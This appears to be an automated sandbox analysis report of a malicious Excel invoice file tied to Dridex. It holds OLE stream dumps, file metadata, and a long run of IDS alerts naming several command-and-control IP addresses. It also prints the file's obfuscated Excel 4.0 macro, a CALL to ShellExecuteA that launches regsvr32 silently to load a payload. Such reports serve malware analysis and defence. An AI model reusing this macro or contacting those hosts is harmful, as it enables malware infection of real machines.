                                                                                                                                      Data Raw:cc 61 b2 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                                                                                                                                      Stream Path: VBA/__SRP_0, File Type: data, Stream Size: 2060
                                                                                                                                      General
                                                                                                                                      Stream Path:VBA/__SRP_0
                                                                                                                                      File Type:data
                                                                                                                                      Stream Size:2060
                                                                                                                                      Entropy:3.45011283232
                                                                                                                                      Base64 Encoded:False
                                                                                                                                      Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ X . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . . . . Y . n . M . . . W . . v _ . . . . . . . .
                                                                                                                                      Data Raw:93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 02 00 00 00 00 00 01 00 02 00 02 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00 7e 02 00 00 00 00 00 00 7e 02 00 00 00
                                                                                                                                      Stream Path: VBA/__SRP_1, File Type: data, Stream Size: 187
                                                                                                                                      General
                                                                                                                                      Stream Path:VBA/__SRP_1
                                                                                                                                      File Type:data
                                                                                                                                      Stream Size:187
                                                                                                                                      Entropy:1.91493173134
                                                                                                                                      Base64 Encoded:False
                                                                                                                                      Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . w q . . . . . . . . . . . . . . . . n i m o . . . . . . . . . . . . . . . . y e l ^ . . . . . . . . . . . . . . .
                                                                                                                                      Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 11 00 00 00 00 00 00 00 00 00 03 00 02 00 00 00 00 00 00 08 02 00 00 00 00 00
                                                                                                                                      Stream Path: VBA/__SRP_2, File Type: data, Stream Size: 363
                                                                                                                                      General
                                                                                                                                      Stream Path:VBA/__SRP_2
                                                                                                                                      File Type:data
                                                                                                                                      Stream Size:363
                                                                                                                                      Entropy:2.21122978445
                                                                                                                                      Base64 Encoded:False
                                                                                                                                      Stream Path: VBA/__SRP_3, File Type: data, Stream Size: 398
                                                                                                                                      General
                                                                                                                                      Stream Path:VBA/__SRP_3
                                                                                                                                      File Type:data
                                                                                                                                      Stream Size:398
                                                                                                                                      Entropy:2.07709195049
                                                                                                                                      Base64 Encoded:False
                                                                                                                                      Stream Path: VBA/dir, File Type: data, Stream Size: 820
                                                                                                                                      General
                                                                                                                                      Stream Path:VBA/dir
                                                                                                                                      File Type:data
                                                                                                                                      Stream Size:820
                                                                                                                                      Entropy:6.49145935167
                                                                                                                                      Base64 Encoded:True
                                                                                                                                       Data ASCII:(dot-padded dump of the compressed dir stream; recoverable strings: VBAProject, stdole, C:\Windows\System32\...e2.tlb, OLE Automation)

                                                                                                                                      Macro 4.0 Code

                                                                                                                                      CALL(wegb&o0, "S"&ohgdfww&"A", i0&i0&"CCCC"&i0, 0, v0&"p"&w00&"n", "r"&w00&"gsvr"&o0, " -s "&bb&ab&ba, 0, 0)
                                                                                                                                      
                                                                                                                                      "=CALL(wegb&o0,""S""&ohgdfww&""A"",i0&i0&""CCCC""&i0,0,v0&""p""&w00&""n"",""r""&w00&""gsvr""&o0,"" -s ""&bb&ab&ba,0,0)"=RETURN()

                                                                                                                                      OLE File "/opt/package/joesandbox/database/analysis/338309/sample/INV2680371456-20210111889374.xlsm"

                                                                                                                                      Indicators

                                                                                                                                      Has Summary Info:False
                                                                                                                                      Application Name:unknown
                                                                                                                                      Encrypted Document:False
                                                                                                                                      Contains Word Document Stream:
                                                                                                                                      Contains Workbook/Book Stream:
                                                                                                                                      Contains PowerPoint Document Stream:
                                                                                                                                      Contains Visio Document Stream:
                                                                                                                                      Contains ObjectPool Stream:
                                                                                                                                      Flash Objects Count:
                                                                                                                                      Contains VBA Macros:False

                                                                                                                                      Summary

                                                                                                                                      Author:
                                                                                                                                      Last Saved By:
                                                                                                                                      Create Time:2020-12-07T14:38:21Z
                                                                                                                                      Last Saved Time:2021-01-11T14:32:26Z
                                                                                                                                      Creating Application:Microsoft Excel
                                                                                                                                      Security:0

                                                                                                                                      Document Summary

                                                                                                                                      Thumbnail Scaling Desired:false
                                                                                                                                      Company:
                                                                                                                                      Contains Dirty Links:false
                                                                                                                                      Shared Document:false
                                                                                                                                      Changed Hyperlinks:false
                                                                                                                                      Application Version:16.0300

                                                                                                                                      Streams

                                                                                                                                      Stream Path: \x1CompObj, File Type: data, Stream Size: 115
                                                                                                                                      General
                                                                                                                                      Stream Path:\x1CompObj
                                                                                                                                      File Type:data
                                                                                                                                      Stream Size:115
                                                                                                                                      Entropy:4.80096587863
                                                                                                                                      Base64 Encoded:False
                                                                                                                                       Data ASCII:(dot-padded dump; recoverable strings: Microsoft Forms 2.0 Form, Embedded Object, Forms.MultiPage.1)
                                                                                                                                      Stream Path: f, File Type: data, Stream Size: 178
                                                                                                                                      General
                                                                                                                                      Stream Path:f
                                                                                                                                      File Type:data
                                                                                                                                      Stream Size:178
                                                                                                                                      Entropy:2.56223021678
                                                                                                                                      Base64 Encoded:False
                                                                                                                                       Data ASCII:(dot-padded dump; recoverable strings: Page1, Page2)
                                                                                                                                      Stream Path: i02/\x1CompObj, File Type: data, Stream Size: 110
                                                                                                                                      General
                                                                                                                                      Stream Path:i02/\x1CompObj
                                                                                                                                      File Type:data
                                                                                                                                      Stream Size:110
                                                                                                                                      Entropy:4.63372611993
                                                                                                                                      Base64 Encoded:False
                                                                                                                                       Data ASCII:(dot-padded dump; recoverable strings: Microsoft Forms 2.0 Form, Embedded Object, Forms.Form.1)
                                                                                                                                      Stream Path: i02/f, File Type: data, Stream Size: 40
                                                                                                                                      General
                                                                                                                                      Stream Path:i02/f
                                                                                                                                      File Type:data
                                                                                                                                      Stream Size:40
                                                                                                                                      Entropy:1.54176014818
                                                                                                                                      Base64 Encoded:False
                                                                                                                                      Stream Path: i02/o, File Type: empty, Stream Size: 0
                                                                                                                                      General
                                                                                                                                      Stream Path:i02/o
                                                                                                                                      File Type:empty
                                                                                                                                      Stream Size:0
                                                                                                                                      Entropy:0.0
                                                                                                                                      Base64 Encoded:False
                                                                                                                                      Data ASCII:
                                                                                                                                      Data Raw:
                                                                                                                                      Stream Path: i03/\x1CompObj, File Type: data, Stream Size: 110
                                                                                                                                      General
                                                                                                                                      Stream Path:i03/\x1CompObj
                                                                                                                                      File Type:data
                                                                                                                                      Stream Size:110
                                                                                                                                      Entropy:4.63372611993
                                                                                                                                      Base64 Encoded:False
                                                                                                                                       Data ASCII:(dot-padded dump; recoverable strings: Microsoft Forms 2.0 Form, Embedded Object, Forms.Form.1)
                                                                                                                                      Stream Path: i03/f, File Type: data, Stream Size: 40
                                                                                                                                      General
                                                                                                                                      Stream Path:i03/f
                                                                                                                                      File Type:data
                                                                                                                                      Stream Size:40
                                                                                                                                      Entropy:1.90677964945
                                                                                                                                      Base64 Encoded:False
                                                                                                                                      Stream Path: i03/o, File Type: empty, Stream Size: 0
                                                                                                                                      General
                                                                                                                                      Stream Path:i03/o
                                                                                                                                      File Type:empty
                                                                                                                                      Stream Size:0
                                                                                                                                      Entropy:0.0
                                                                                                                                      Base64 Encoded:False
                                                                                                                                      Data ASCII:
                                                                                                                                      Data Raw:
                                                                                                                                      Stream Path: o, File Type: data, Stream Size: 152
                                                                                                                                      General
                                                                                                                                      Stream Path:o
                                                                                                                                      File Type:data
                                                                                                                                      Stream Size:152
                                                                                                                                      Entropy:2.68720470607
                                                                                                                                      Base64 Encoded:False
                                                                                                                                       Data ASCII:(dot-padded dump; recoverable strings: Page1, Page2, Tab3, Tab4, Calibri)
                                                                                                                                      Stream Path: x, File Type: data, Stream Size: 48
                                                                                                                                      General
                                                                                                                                      Stream Path:x
                                                                                                                                      File Type:data
                                                                                                                                      Stream Size:48
                                                                                                                                      Entropy:1.42267983198
                                                                                                                                      Base64 Encoded:False

                                                                                                                                      Network Behavior

                                                                                                                                      Snort IDS Alerts

                                                                                                                                       Timestamp                 Protocol  SID      Message                                                                       Source Port  Dest Port  Source IP      Dest IP
                                                                                                                                       01/12/21-01:43:58.265168  TCP       2023476  ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)  443          49166      77.220.64.37   192.168.2.22
                                                                                                                                       01/12/21-01:44:01.015768  TCP       2023476  ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)  3308         49168      80.86.91.27    192.168.2.22
                                                                                                                                       01/12/21-01:44:01.606814  TCP       2023476  ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)  3389         49169      5.100.228.233  192.168.2.22
                                                                                                                                       01/12/21-01:44:01.606814  TCP       2022535  ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)  3389         49169      5.100.228.233  192.168.2.22
                                                                                                                                       01/12/21-01:44:02.725135  TCP       2023476  ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)  443          49171      77.220.64.37   192.168.2.22
                                                                                                                                       01/12/21-01:44:03.248611  TCP       2023476  ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)  3308         49172      80.86.91.27    192.168.2.22
                                                                                                                                       01/12/21-01:44:03.773777  TCP       2023476  ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)  3389         49173      5.100.228.233  192.168.2.22
                                                                                                                                       01/12/21-01:44:03.773777  TCP       2022535  ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)  3389         49173      5.100.228.233  192.168.2.22
                                                                                                                                       01/12/21-01:44:04.816543  TCP       2023476  ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)  443          49175      77.220.64.37   192.168.2.22
                                                                                                                                       01/12/21-01:44:05.342645  TCP       2023476  ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)  3308         49176      80.86.91.27    192.168.2.22
                                                                                                                                       01/12/21-01:44:05.861566  TCP       2023476  ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)  3389         49177      5.100.228.233  192.168.2.22
                                                                                                                                       01/12/21-01:44:05.861566  TCP       2022535  ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)  3389         49177      5.100.228.233  192.168.2.22
                                                                                                                                       01/12/21-01:44:06.899440  TCP       2023476  ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)  443          49179      77.220.64.37   192.168.2.22
                                                                                                                                       01/12/21-01:44:07.433882  TCP       2023476  ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)  3308         49180      80.86.91.27    192.168.2.22
                                                                                                                                       01/12/21-01:44:07.976250  TCP       2023476  ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)  3389         49181      5.100.228.233  192.168.2.22
                                                                                                                                       01/12/21-01:44:07.976250  TCP       2022535  ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)  3389         49181      5.100.228.233  192.168.2.22
                                                                                                                                       01/12/21-01:44:09.036133  TCP       2023476  ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)  443          49183      77.220.64.37   192.168.2.22
                                                                                                                                      01/12/21-01:44:09.566865TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084918480.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:44:10.076718TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491855.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:10.076718TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491855.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:11.132100TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434918777.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:44:11.645475TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084918880.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:44:12.172173TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491895.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:12.172173TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491895.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:13.200539TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434919177.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:44:13.712604TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084919280.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:44:14.238930TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491935.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:14.238930TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491935.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:15.545794TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434919577.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:44:16.092017TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084919680.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:44:16.606197TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491975.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:16.606197TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491975.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:18.668025TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434919977.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:44:19.192309TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084920080.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:44:19.719108TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492015.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:19.719108TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492015.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:20.782259TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434920377.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:44:21.313052TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084920480.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:44:21.845259TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492055.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:21.845259TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492055.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:22.895057TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434920777.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:44:23.405578TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084920880.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:44:23.953654TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492095.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:23.953654TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492095.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:25.002498TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434921177.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:44:25.530736TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084921280.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:44:26.056875TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492135.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:26.056875TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492135.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:27.108377TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434921577.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:44:27.632953TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084921680.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:44:28.141501TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492175.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:28.141501TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492175.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:29.176541TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434921977.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:44:29.707201TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084922080.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:44:30.215452TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492215.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:30.215452TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492215.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:31.256057TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434922377.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:44:31.788343TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084922580.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:44:32.313060TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492265.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:32.313060TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492265.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:33.550778TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434922977.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:44:34.681061TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084923080.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:44:35.362624TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492315.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:35.362624TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492315.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:36.422943TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434923377.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:44:36.946269TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084923480.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:44:37.479110TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492355.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:37.479110TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492355.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:38.558764TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434923777.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:44:39.085287TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084923880.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:44:39.621599TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492395.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:39.621599TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492395.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:40.655749TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434924177.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:44:41.192565TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084924280.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:44:41.709332TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492435.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:41.709332TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492435.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:42.762681TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434924577.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:44:43.286682TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084924680.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:44:43.812850TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492475.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:43.812850TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492475.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:44.949043TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434924977.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:44:45.502620TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084925080.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:44:46.036344TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492515.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:46.036344TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492515.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:47.099344TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434925377.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:44:47.623986TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084925480.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:44:48.146230TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492555.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:48.146230TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492555.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:49.200660TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434925777.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:44:49.730973TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084925880.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:44:50.258776TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492595.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:50.258776TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492595.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:51.536021TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434926177.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:44:52.459368TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084926280.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:44:53.023442TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492635.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:53.023442TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492635.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:54.069024TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434926577.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:44:54.586272TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084926680.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:44:55.105278TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492675.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:55.105278TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492675.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:56.163308TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434926977.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:44:56.687833TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084927080.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:44:57.231482TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492715.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:57.231482TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492715.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:58.286957TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434927377.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:44:58.809666TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084927480.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:44:59.327613TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492755.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:59.327613TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492755.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:45:00.440152TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434927777.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:45:00.957031TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084927880.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:45:01.454270TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492795.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:45:01.454270TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492795.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:45:02.480574TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434928177.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:45:03.007372TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084928280.86.91.27192.168.2.22
